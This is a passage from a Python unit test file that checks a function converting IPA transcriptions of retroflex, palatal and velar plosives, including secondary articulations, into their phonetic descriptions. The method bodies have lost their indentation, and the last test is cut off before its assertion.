def test_ɖ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant
def test_ʈʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex plosive pulmonic egressive consonant
def test_ʈʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant
def test_ʈʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex plosive pulmonic egressive consonant
def test_ɖ_is_the_representation_of_the_voiced_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ")
self.assertEqual(actual, expected)
def test_ʈ̬_is_the_representation_of_the_voiced_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬")
self.assertEqual(actual, expected)
# voiced labialized retroflex plosive pulmonic egressive consonant
def test_ɖʷ_is_the_representation_of_the_voiced_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʷ")
self.assertEqual(actual, expected)
def test_ʈ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex plosive pulmonic egressive consonant
def test_ɖʲ_is_the_representation_of_the_voiced_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʲ")
self.assertEqual(actual, expected)
def test_ʈ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex plosive pulmonic egressive consonant
def test_ɖˠ_is_the_representation_of_the_voiced_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖˠ")
self.assertEqual(actual, expected)
def test_ʈ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex plosive pulmonic egressive consonant
def test_ɖˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖˤ")
self.assertEqual(actual, expected)
def test_ʈ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˤ")
self.assertEqual(actual, expected)
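# Editorial sketch: the voicing mark paired with ʈ in the tests above is
# U+032C COMBINING CARON BELOW; a sanity check mirroring the voiceless case:
def test_voicing_diacritic_code_point(self):
    import unicodedata
    self.assertEqual(unicodedata.name("\u032C"), "COMBINING CARON BELOW")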
# voiced aspirated retroflex plosive pulmonic egressive consonant
def test_ɖʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex plosive pulmonic egressive consonant
def test_ɖʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰʷ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex plosive pulmonic egressive consonant
def test_ɖʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex plosive pulmonic egressive consonant
def test_ɖʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant
def test_ɖʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal plosive pulmonic egressive consonant
def test_c_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c")
self.assertEqual(actual, expected)
def test_c̊_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊")
self.assertEqual(actual, expected)
def test_c̥_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥")
self.assertEqual(actual, expected)
def test_ɟ̊_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊")
self.assertEqual(actual, expected)
def test_ɟ̥_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal plosive pulmonic egressive consonant
def test_cʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʷ")
self.assertEqual(actual, expected)
def test_c̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ʷ")
self.assertEqual(actual, expected)
def test_c̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ʷ")
self.assertEqual(actual, expected)
def test_ɟ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʷ")
self.assertEqual(actual, expected)
def test_ɟ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal plosive pulmonic egressive consonant
def test_cʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʲ")
self.assertEqual(actual, expected)
def test_c̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ʲ")
self.assertEqual(actual, expected)
def test_c̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ʲ")
self.assertEqual(actual, expected)
def test_ɟ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʲ")
self.assertEqual(actual, expected)
def test_ɟ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal plosive pulmonic egressive consonant
def test_cˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cˠ")
self.assertEqual(actual, expected)
def test_c̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ˠ")
self.assertEqual(actual, expected)
def test_c̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ˠ")
self.assertEqual(actual, expected)
def test_ɟ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ˠ")
self.assertEqual(actual, expected)
def test_ɟ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal plosive pulmonic egressive consonant
def test_cˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cˤ")
self.assertEqual(actual, expected)
def test_c̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ˤ")
self.assertEqual(actual, expected)
def test_c̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ˤ")
self.assertEqual(actual, expected)
def test_ɟ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ˤ")
self.assertEqual(actual, expected)
def test_ɟ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal plosive pulmonic egressive consonant
def test_cʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal plosive pulmonic egressive consonant
def test_cʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal plosive pulmonic egressive consonant
def test_cʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal plosive pulmonic egressive consonant
def test_cʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant
def test_cʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal plosive pulmonic egressive consonant
def test_ɟ_is_the_representation_of_the_voiced_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ")
self.assertEqual(actual, expected)
def test_c̬_is_the_representation_of_the_voiced_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬")
self.assertEqual(actual, expected)
# voiced labialized palatal plosive pulmonic egressive consonant
def test_ɟʷ_is_the_representation_of_the_voiced_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʷ")
self.assertEqual(actual, expected)
def test_c̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal plosive pulmonic egressive consonant
def test_ɟʲ_is_the_representation_of_the_voiced_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʲ")
self.assertEqual(actual, expected)
def test_c̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal plosive pulmonic egressive consonant
def test_ɟˠ_is_the_representation_of_the_voiced_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟˠ")
self.assertEqual(actual, expected)
def test_c̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal plosive pulmonic egressive consonant
def test_ɟˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟˤ")
self.assertEqual(actual, expected)
def test_c̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal plosive pulmonic egressive consonant
def test_ɟʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰ")
self.assertEqual(actual, expected)
def test_c̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal plosive pulmonic egressive consonant
def test_ɟʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰʷ")
self.assertEqual(actual, expected)
def test_c̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal plosive pulmonic egressive consonant
def test_ɟʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰʲ")
self.assertEqual(actual, expected)
def test_c̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal plosive pulmonic egressive consonant
def test_ɟʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰˠ")
self.assertEqual(actual, expected)
def test_c̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant
def test_ɟʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰˤ")
self.assertEqual(actual, expected)
def test_c̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless velar plosive pulmonic egressive consonant
def test_k_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k")
self.assertEqual(actual, expected)
def test_k̊_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊")
self.assertEqual(actual, expected)
def test_k̥_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥")
self.assertEqual(actual, expected)
def test_g̊_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊")
self.assertEqual(actual, expected)
def test_g̥_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥")
self.assertEqual(actual, expected)
# voiceless labialized velar plosive pulmonic egressive consonant
def test_kʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʷ")
self.assertEqual(actual, expected)
def test_k̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ʷ")
self.assertEqual(actual, expected)
def test_k̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ʷ")
self.assertEqual(actual, expected)
def test_g̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʷ")
self.assertEqual(actual, expected)
def test_g̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʷ")
